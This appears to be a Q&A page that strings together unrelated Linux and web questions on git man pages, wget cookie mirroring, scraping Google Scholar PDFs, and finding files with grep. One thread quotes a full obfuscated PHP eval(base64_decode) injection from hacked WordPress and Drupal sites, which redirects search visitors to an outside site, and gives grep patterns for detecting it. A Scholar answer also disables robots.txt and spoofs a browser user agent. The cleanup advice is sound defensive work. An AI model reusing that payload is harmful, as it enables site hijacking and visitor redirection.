I'm taking the git man page as an example, but I have seen the example I am about to use many places throughout UNIX/Linux.
Under the git man page, it has the following header:
Main Porcelain Commands
Underneath this header, there are a lot of commands with dashes between such as:
git-clone
Since that is headed under Commands you would assume that it means git-clone is a command (I very well know git clone [directory] is a valid.
But it appears that it isn't - so why does the man page list git-clone as being a command? The man pages are good, if you can decode them right.
On my system it says git-clone(1). It is the name of a man page about a command not a command itself.
man git-clone gives:
SYNOPSIS
git clone [--template=<template_directory>]
… showing it with the space instead of the dash.
Related
Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that each child has an index.html of the same login page. It's like the cookie worked fine for the root folder but nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
Secondly, note that if I didn't put remember_me value to 1 that cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result being that the former would only download the login page and the latter getting to all child folders, only with children containing index of login and that's it.
I'm kind of stuck and my experience with wget and http is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S: I'm using Linux if that reflects the answers I'm given.
Figured it out. Kind of.
When I wget with options above, I get all children. If I then wget each child(again with options above) and make sure to specify folder by ending with "/", then it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's, children or anything as such.
I'd like to write a simple web spider or just use wget to download pdf results from google scholar. That would actually be quite a spiffy way to get papers for research.
I have read the following pages on stackoverflow:
Crawl website using wget and limit total number of crawled links
How do web spiders differ from Wget's spider?
Downloading all PDF files from a website
How to download all files (but not HTML) from a website using wget?
The last page is probably the most inspirational of all. I did try using wget as suggested on this.
My google scholar search result page is thus but nothing was downloaded.
Given that my level of understanding of webspiders is minimal, what should I do to make this possible? I do realize that writing a spider is perhaps very involved and is a project I may not want to undertake. If it is possible using wget, that would be absolutely awesome.
wget -e robots=off -H --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -r -l 1 -nd -A pdf http://scholar.google.com/scholar?q=filetype%3Apdf+liquid+films&btnG=&hl=en&as_sdt=0%2C23
A few things to note:
Use of filetyle:pdf in the search query
One level of recursion
-A pdf for only accepting pdfs
-H to span hosts
-e robots=off and use of --user-agent will ensure best results. Google Scholar rejects a blank user agent, and pdf repositories are likely to disallow robots.
The limitation of course is that this will only hit the first page of results. You could expand the depth of recursion, but this will run wild and take forever. I would recommend using a combination of something like Beautiful Soup and wget subprocesses, so that you can parse and traverse the search results strategically.
I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);
I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.
Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.
It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but it could be not enough, so you should consider using these PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?
I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!
I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download
all the files that are necessary to
properly display a given HTML page.
if you want to download recursively, use wget with -r option, instead of curl. also check out the wget man page to get certain types of files.